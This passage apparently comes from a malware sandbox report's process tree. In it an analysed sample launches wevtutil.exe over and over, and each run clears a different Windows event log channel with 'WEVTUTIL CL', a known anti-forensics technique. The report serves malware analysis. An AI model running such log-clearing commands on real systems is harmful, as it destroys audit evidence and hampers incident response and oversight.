        
        WEVTUTIL CL "Microsoft-Windows-Direct3D12/Logging"
        5⤵
        
        PID:4040
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Direct3D12/PerfTiming"
        5⤵
        
        PID:2960
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Direct3D9/Analytic"
        5⤵
        
        PID:2928
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Direct3DShaderCache/Default"
        5⤵
        
        PID:4420
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DirectComposition/Diagnostic"
        5⤵
        
        PID:3932
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DirectManipulation/Diagnostic"
        5⤵
        
        PID:1768
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DirectShow-KernelSupport/Performance"
        5⤵
        
        PID:3092
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DirectSound/Debug"
        5⤵
        
        PID:3860
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Disk/Operational"
        5⤵
        
        PID:3288
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DiskDiagnostic/Operational"
        5⤵
        
        PID:1460
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"
        5⤵
        
        PID:4600
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DiskDiagnosticResolver/Operational"
        5⤵
        
        PID:5036
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Dism-Api/Analytic"
        5⤵
        
        PID:4032
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Dism-Api/ExternalAnalytic"
        5⤵
        
        PID:3952
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Dism-Api/InternalAnalytic"
        5⤵
        
        PID:1096
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Dism-Cli/Analytic"
        5⤵
        
        PID:880
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DisplayColorCalibration/Debug"
        5⤵
        
        PID:1164
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DisplayColorCalibration/Operational"
        5⤵
        
        PID:4668
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DisplaySwitch/Diagnostic"
        5⤵
        
        PID:3528
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Documents/Performance"
        5⤵
        
        PID:5104
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Dot3MM/Diagnostic"
        5⤵
        
        PID:3748
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DriverFrameworks-UserMode/Operational"
        5⤵
        
        PID:4272
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DucUpdateAgent/Operational"
        5⤵
        
        PID:3848
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Dwm-API/Diagnostic"
        5⤵
        
        PID:4316
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Dwm-Core/Diagnostic"
        5⤵
        
        PID:1920
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Dwm-Dwm/Diagnostic"
        5⤵
        
        PID:4196
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Dwm-Redir/Diagnostic"
        5⤵
        
        PID:1956
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Dwm-Udwm/Diagnostic"
        5⤵
        
        PID:4720
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DxgKrnl-Admin"
        5⤵
        
        PID:2668
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DxgKrnl-Operational"
        5⤵
        
        PID:4916
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DxgKrnl/Contention"
        5⤵
        
        PID:1944
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DxgKrnl/Diagnostic"
        5⤵
        
        PID:3128
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DxgKrnl/Performance"
        5⤵
        
        PID:1532
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DxgKrnl/Power"
        5⤵
        
        PID:4528
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DxpTaskSyncProvider/Analytic"
        5⤵
        
        PID:272
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-EDP-Application-Learning/Admin"
        5⤵
        
        PID:4056
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-EDP-Audit-Regular/Admin"
        5⤵
        
        PID:3704
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-EDP-Audit-TCB/Admin"
        5⤵
        
        PID:1812
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-EFS/Debug"
        5⤵
        
        PID:3040
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ESE/IODiagnose"
        5⤵
        
        PID:2984
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ESE/Operational"
        5⤵
        
        PID:2244
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-EapHost/Analytic"
        5⤵
        
        PID:4476
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-EapHost/Debug"
        5⤵
        
        PID:3416
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-EapHost/Operational"
        5⤵
        
        PID:756
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-EapMethods-RasChap/Operational"
        5⤵
        
        PID:4412
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-EapMethods-RasTls/Operational"
        5⤵
        
        PID:1680
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-EapMethods-Sim/Operational"
        5⤵
        
        PID:3964
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-EapMethods-Ttls/Operational"
        5⤵
        
        PID:2368
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-EaseOfAccess/Diagnostic"
        5⤵
        
        PID:1828
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Energy-Estimation-Engine/EventLog"
        5⤵
        
        PID:3568
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Energy-Estimation-Engine/Trace"
        5⤵
        
        PID:2080
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-EnhancedStorage-EhStorTcgDrv/Analytic"
        5⤵
        
        PID:3188
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-EventCollector/Debug"
        5⤵
        
        PID:4536
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-EventCollector/Operational"
        5⤵
        
        PID:3956
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-EventLog-WMIProvider/Debug"
        5⤵
        
        PID:2072
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-EventLog/Analytic"
        5⤵
        
        PID:3812
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-EventLog/Debug"
        5⤵
        
        PID:5116
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-FMS/Analytic"
        5⤵
        
        PID:4244
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-FMS/Debug"
        5⤵
        
        PID:1008
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-FMS/Operational"
        5⤵
        
        PID:960
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-FailoverClustering-Client/Diagnostic"
        5⤵
        
        PID:4988
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Fault-Tolerant-Heap/Operational"
        5⤵
        
        PID:3636
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-FeatureConfiguration/Analytic"
        5⤵
        
        PID:264
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-FeatureConfiguration/Operational"
        5⤵
        
        PID:4444
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-FileHistory-Catalog/Analytic"
        5⤵
        
        PID:4588
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-FileHistory-Catalog/Debug"
        5⤵
        
        PID:1832
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-FileHistory-ConfigManager/Analytic"
        5⤵
        
        PID:1684
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-FileHistory-ConfigManager/Debug"
        5⤵
        
        PID:4644
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-FileHistory-Core/Analytic"
        5⤵
        
        PID:2172
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-FileHistory-Core/Debug"
        5⤵
        
        PID:3932
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-FileHistory-Core/WHC"
        5⤵
        
        PID:2064
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-FileHistory-Engine/Analytic"
        5⤵
        
        PID:4204
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-FileHistory-Engine/BackupLog"
        5⤵
        
        PID:4464
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-FileHistory-Engine/Debug"
        5⤵
        
        PID:4352
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-FileHistory-EventListener/Analytic"
        5⤵
        
        PID:4688
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-FileHistory-EventListener/Debug"
        5⤵
        
        PID:732
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-FileHistory-Service/Analytic"
        5⤵
        
        PID:5036
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-FileHistory-Service/Debug"
        5⤵
        
        PID:3516
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-FileHistory-UI-Events/Analytic"
        5⤵
        
        PID:3564
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-FileHistory-UI-Events/Debug"
        5⤵
        
        PID:1096
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-FileInfoMinifilter/Operational"
        5⤵
        
        PID:4628
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Firewall-CPL/Diagnostic"
        5⤵
        
        PID:3172
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Folder Redirection/Operational"
        5⤵
        
        PID:3096
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Forwarding/Debug"
        5⤵
        
        PID:3528
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Forwarding/Operational"
        5⤵
        
        PID:5104
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-GPIO-ClassExtension/Analytic"
        5⤵
        
        PID:3748
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-GenericRoaming/Admin"
        5⤵
        
        PID:4272
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-GroupPolicy/Operational"
        5⤵
        
        PID:3320
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-HAL/Debug"
        5⤵
        
        PID:4316
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-HealthCenter/Debug"
        5⤵
        
        PID:4812
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-HealthCenter/Performance"
        5⤵
        
        PID:612
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-HealthCenterCPL/Performance"
        5⤵
        
        PID:1960
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-HelloForBusiness/Operational"
        5⤵
        
        PID:2176
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Help/Operational"
        5⤵
        
        PID:1428
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"
        5⤵
        
        PID:1664
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-HomeGroup Control Panel/Operational"
        5⤵
        
        PID:3128
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-HomeGroup Listener Service/Operational"
        5⤵
        
        PID:1532
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"
        5⤵
        
        PID:3200
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-HomeGroup Provider Service/Operational"
        5⤵
        
        PID:3820
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-HomeGroup-ListenerService"
        5⤵
        
        PID:4056
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-HotspotAuth/Analytic"
        5⤵
        
        PID:3704
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-HotspotAuth/Operational"
        5⤵
        
        PID:1812
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-HttpService/Log"
        5⤵
        
        PID:3772
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-HttpService/Trace"
        5⤵
        
        PID:2984
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Hyper-V-Guest-Drivers/Admin"
        5⤵
        
        PID:1592
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Hyper-V-Guest-Drivers/Analytic"
        5⤵
        
        PID:4396
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Hyper-V-Guest-Drivers/Debug"
        5⤵
        
        PID:2244
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Hyper-V-Guest-Drivers/Diagnose"
        5⤵
        
        PID:4476
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Hyper-V-Guest-Drivers/Operational"
        5⤵
        
        PID:3416
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Hyper-V-Hypervisor-Admin"
        5⤵
        
        PID:3308
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Hyper-V-Hypervisor-Analytic"
        5⤵
        
        PID:2288
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Hyper-V-Hypervisor-Operational"
        5⤵
        
        PID:4684
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Hyper-V-NETVSC/Diagnostic"
        5⤵
        
        PID:2644
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Hyper-V-VID-Admin"
        5⤵
        
        PID:4504
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Hyper-V-VID-Analytic"
        5⤵
        
        PID:1580
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-IE-SmartScreen"
        5⤵
        
        PID:1568
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-IKE/Operational"
        5⤵
        
        PID:868
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-IKEDBG/Debug"
        5⤵
        
        PID:540
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-IME-Broker/Analytic"
        5⤵
        
        PID:1640
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-IME-CandidateUI/Analytic"
        5⤵
        
        PID:1456
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-IME-CustomerFeedbackManager/Debug"
        5⤵
        
        PID:2860
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-IME-CustomerFeedbackManagerUI/Analytic"
        5⤵
        
        PID:4372
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-IME-JPAPI/Analytic"
        5⤵
        
        PID:268
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-IME-JPLMP/Analytic"
        5⤵
        
        PID:1848
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-IME-JPPRED/Analytic"
        5⤵
        
        PID:1856
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-IME-JPSetting/Analytic"
        5⤵
        
        PID:1912
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-IME-JPTIP/Analytic"
        5⤵
        
        PID:4936
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-IME-KRAPI/Analytic"
        5⤵
        
        PID:396
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-IME-KRTIP/Analytic"
        5⤵
        
        PID:3636
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-IME-OEDCompiler/Analytic"
        5⤵
        
        PID:816
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-IME-TCCORE/Analytic"
        5⤵
        
        PID:4616
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-IME-TCTIP/Analytic"
        5⤵
        
        PID:4052
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-IME-TIP/Analytic"
        5⤵
        
        PID:1836
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-IPNAT/Diagnostic"
        5⤵
        
        PID:4644
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-IPSEC-SRV/Diagnostic"
        5⤵
        
        PID:204
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-IPxlatCfg/Debug"
        5⤵
        
        PID:3132
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-IPxlatCfg/Operational"
        5⤵
        
        PID:3092
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-IdCtrls/Analytic"
        5⤵
        
        PID:4304
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-IdCtrls/Operational"
        5⤵
        
        PID:3804
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-IndirectDisplays-ClassExtension-Events/Diagnostic"
        5⤵
        
        PID:1460
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Input-HIDCLASS-Analytic"
        5⤵
        
        PID:1132
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-InputSwitch/Diagnostic"
        5⤵
        
        PID:788
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"
        5⤵
        
        PID:5036
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Iphlpsvc/Debug"
        5⤵
        
        PID:3516
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Iphlpsvc/Operational"
        5⤵
        
        PID:3564
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Iphlpsvc/Trace"
        5⤵
        
        PID:1096
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-KdsSvc/Operational"
        5⤵
        
        PID:4628
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kerberos/Operational"
        5⤵
        
        PID:3172
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-Acpi/Diagnostic"
        5⤵
        
        PID:3096
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-AppCompat/General"
        5⤵
        
        PID:3600
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-AppCompat/Performance"
        5⤵
        
        PID:2040
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-ApphelpCache/Analytic"
        5⤵
        
        PID:4968
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-ApphelpCache/Debug"
        5⤵
        
        PID:2032
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-ApphelpCache/Operational"
        5⤵
        
        PID:4272
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-Boot/Analytic"
        5⤵
        
        PID:3320
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-Boot/Operational"
        5⤵
        
        PID:4064
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"
        5⤵
        
        PID:2168
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-Disk/Analytic"
        5⤵
        
        PID:612
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-EventTracing/Admin"
        5⤵
        
        PID:4676
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-EventTracing/Analytic"
        5⤵
        
        PID:3196
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-File/Analytic"
        5⤵
        
        PID:2560
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-IO/Operational"
        5⤵
        
        PID:4524
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-Interrupt-Steering/Diagnostic"
        5⤵
        
        PID:1440
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-IoTrace/Diagnostic"
        5⤵
        
        PID:1756
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-LiveDump/Analytic"
        5⤵
        
        PID:2808
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-LiveDump/Operational"
        5⤵
        
        PID:4164
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-Memory/Analytic"
        5⤵
        
        PID:2516
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-Network/Analytic"
        5⤵
        
        PID:4692
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-Pdc/Diagnostic"
        5⤵
        
        PID:3704
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-Pep/Diagnostic"
        5⤵
        
        PID:2628
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-PnP/Boot Diagnostic"
        5⤵
        
        PID:912
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-PnP/Configuration"
        5⤵
        
        PID:1632
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-PnP/Configuration Diagnostic"
        5⤵
        
        PID:3836
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-PnP/Device Enumeration Diagnostic"
        5⤵
        
        PID:1584
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-PnP/Driver Diagnostic"
        5⤵
        
        PID:2912
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-PnP/Driver Watchdog"
        5⤵
        
        PID:4476
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-Power/Diagnostic"
        5⤵
        
        PID:4356
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"
        5⤵
        
        PID:2288
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-Power/Thermal-Operational"
        5⤵
        
        PID:4060
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-Prefetch/Diagnostic"
        5⤵
        
        PID:2644
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-Process/Analytic"
        5⤵
        
        PID:4504
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"
        5⤵
        
        PID:3568
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-Registry/Analytic"
        5⤵
        
        PID:1308
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-Registry/Performance"
        5⤵
        
        PID:3188
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-ShimEngine/Debug"
        5⤵
        
        PID:1200
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-ShimEngine/Diagnostic"
        5⤵
        
        PID:3100
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-ShimEngine/Operational"
        5⤵
        
        PID:1456
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-StoreMgr/Analytic"
        5⤵
        
        PID:1148
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-StoreMgr/Operational"
        5⤵
        
        PID:4456
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-WDI/Analytic"
        5⤵
        
        PID:1796
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-WDI/Debug"
        5⤵
        
        PID:1856
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-WDI/Operational"
        5⤵
        
        PID:776
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-WHEA/Errors"
        5⤵
        
        PID:4936
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-WHEA/Operational"
        5⤵
        
        PID:3292
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Kernel-XDV/Analytic"
        5⤵
        
        PID:4564
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-KeyboardFilter/Admin"
        5⤵
        
        PID:1776
